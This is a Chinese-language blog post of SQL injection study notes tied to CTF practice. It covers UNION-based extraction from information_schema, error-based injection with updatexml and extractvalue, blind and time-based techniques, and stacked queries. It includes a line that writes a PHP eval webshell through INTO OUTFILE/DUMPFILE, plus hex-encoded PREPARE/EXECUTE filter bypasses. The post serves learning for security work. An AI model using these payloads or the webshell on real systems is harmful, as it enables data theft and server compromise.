<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="SQL注入       1、通过order by爆出字段数 2、union操作，联合查询，查询的是在同一个数据表的数据，通过union select 1,2,3…,n来判断回显位置 3、information_schema数据库，为mysql自带数据库，提供数据库源数据访问，最常用的是 TABLES表：提供了关于数据库中表的信息 COLUMNS表：提供了表中">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入笔记">
<meta property="og:url" content="http://jlan.darkflow.top/2022/01/08/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Jlan&#39;s Little World">
<meta property="og:description" content="SQL注入       1、通过order by爆出字段数 2、union操作，联合查询，查询的是在同一个数据表的数据，通过union select 1,2,3…,n来判断回显位置 3、information_schema数据库，为mysql自带数据库，提供数据库源数据访问，最常用的是 TABLES表：提供了关于数据库中表的信息 COLUMNS表：提供了表中">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://jlan.darkflow.top/images/quiz/SQLError.png">
<meta property="og:image" content="http://jlan.darkflow.top/images/quiz/SQLError2.png">
<meta property="og:image" content="http://jlan.darkflow.top/images/quiz/SQLError3.png">
<meta property="article:published_time" content="2022-01-08T05:09:19.000Z">
<meta property="article:modified_time" content="2022-01-08T12:56:10.311Z">
<meta property="article:author" content="Jlan">
<meta property="article:tag" content="Note">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="SQL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://jlan.darkflow.top/images/quiz/SQLError.png"><title>SQL注入笔记 | Jlan's Little World</title><link ref="canonical" href="http://jlan.darkflow.top/2022/01/08/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Jlan's Little World</div><div class="header-banner-info__subtitle">欢迎来学习知识</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">SQL注入笔记</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2022-01-08</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2022-01-08</span></span></div></header><div class="post-body">
        <h1 id="SQL注入"   >
          <a href="#SQL注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#SQL注入" class="headerlink" title="SQL注入"></a><strong>SQL注入</strong></h1>
      <p>1、通过order by爆出字段数</p>
<p>2、union操作，联合查询，查询的是在同一个数据表的数据，通过union select 1,2,3…,n来判断回显位置</p>
<p>3、information_schema数据库，为mysql自带数据库，提供数据库源数据访问，最常用的是</p>
<p><strong>TABLES表</strong>：提供了关于数据库中表的信息</p>
<p><strong>COLUMNS表</strong>：提供了表中列的信息</p>
<p>爆破库名：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select 1,2,database()</span><br></pre></td></tr></table></div></figure>

<p>爆破表名：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()</span><br></pre></td></tr></table></div></figure>

<p>爆破列名：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&quot;想查询的表名&quot;</span><br></pre></td></tr></table></div></figure>

<p>4、报错注入</p>
<p>（1）updatexml：更新XML文档的函数</p>
<p>语法：<strong>updatexml（文档类型，xpath路径，更新的内容）</strong></p>
<p>例子：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and updatexml(0x0a,concat(0x0a,(select database())),’1’)</span><br></pre></td></tr></table></div></figure>

<p>0x0a代表换行符，concat拼接</p>
<p>拼接目的为使得查询结果能完全显示出来</p>
<p>（2）extractvalue：对XML文档进行查询的函数</p>
<p>语法：<strong>extractvalue（文档类型，xpath路径）</strong></p>
<p>报错原理：路径中写入不合法的格式，就会报错并且返回我们写入的非法格式内容，我们可以利用这个得到我们想得到的内容</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema= &#x27;sqli&#x27;))))</span><br></pre></td></tr></table></div></figure>

<p>提示：报错最长显示30个字符内容，如果内容过长可使用substr函数进行拆分</p>
<p>​    例题：CTFHub技能树web-SQL注入-报错注入</p>
<p>​    <img src="/images/quiz/SQLError.png" alt="SQLError"></p>
<p>​    首先爆破库表列名</p>
<p>​    <img src="/images/quiz/SQLError2.png" alt="SQLError2"></p>
<p>​    进而发现flag过长用substr切割</p>
<p>​    <img src="/images/quiz/SQLError3.png" alt="SQLError3"></p>
<p>​    得到flag</p>
<p>5、盲注：</p>
<p>布尔盲注：回显只有两种情况，一种有一种无</p>
<p>if表达式：if(expr1,expr2,expr3)</p>
<p>expr1为真就返回expr2（可用于执行函数）</p>
<p>substr函数：substr(字符串,起始位置,截取长度)</p>
<p>ascii函数：将函数内字符以ascii表转换为数字，而后可以进行判断</p>
<p>时间盲注：无回显，可以通过sleep函数判断是否为时间盲注</p>
<p><del>建议直接sqlmap</del></p>
<p>（1）、sleep函数看延迟时间</p>
<p>（2）、benchmark(执行次数,方式)，执行超多次看延迟时间</p>
<p>6、堆叠注入：通过语句分割符号（  ;  ）分隔多条语句，直接将想要的数据插入到表中，然后再通过查询语句读取</p>
<p>7、mysql文件读写：读取：load_file函数：load_file(‘文件路径’)</p>
<p>写入：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select ‘&lt;?php eval($_POST[cmd]);?&gt;’ into outfile或dumpfile &#x27;绝对路径&#x27;;//建议用dumpfile，因为outfile会在文件末行写入新行，使用的转译换行符，会破坏文件完整性，可能导致一句话木马无法执行</span><br></pre></td></tr></table></div></figure>

<p>8、关键词绕过：通过</p>
<p>（1）、set@a：设定一个语句变量 set@sql=0x16进制数</p>
<p>（2）、prepare : 存储一个sql语句 存到execsql 里面 prepare execsql from @sql</p>
<p>（3）、execute :执行一个sql语句 execute execsql</p>
<p>由于设定语句变量时，mysql会自动将16进制数据转换为文字</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://jlan.darkflow.top">Jlan</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://jlan.darkflow.top/2022/01/08/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/">http://jlan.darkflow.top/2022/01/08/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://jlan.darkflow.top/tags/Note/">Note</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://jlan.darkflow.top/tags/Web/">Web</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://jlan.darkflow.top/tags/SQL/">SQL</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2022/01/08/RCE%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">RCE远程代码执行</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2022/01/08/CTF%E9%9B%B6%E7%A2%8E%E7%AC%94%E8%AE%B0/"><span class="paginator-prev__text">CTF零碎笔记</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="toc-number">1.</span> <span class="toc-text">
          SQL注入</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/head.JPG" alt="avatar"></div><p class="sidebar-ov-author__text">生命不息，折腾不止！</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/zhisenyu" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://www.youtube.com/channel/UCarZXyGTzWssmNANey0TC3g" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a><a class="sidebar-ov-social-item" href="z405454586" target="_blank" rel="noopener" data-popover="微信" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-weixin"></i></span></a><a class="sidebar-ov-social-item" href="tencent://message?uin=405454586" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">5</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">5</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2022</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Jlan</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.0.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div><div>来自DarkFlow战队，暗流涌动</div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>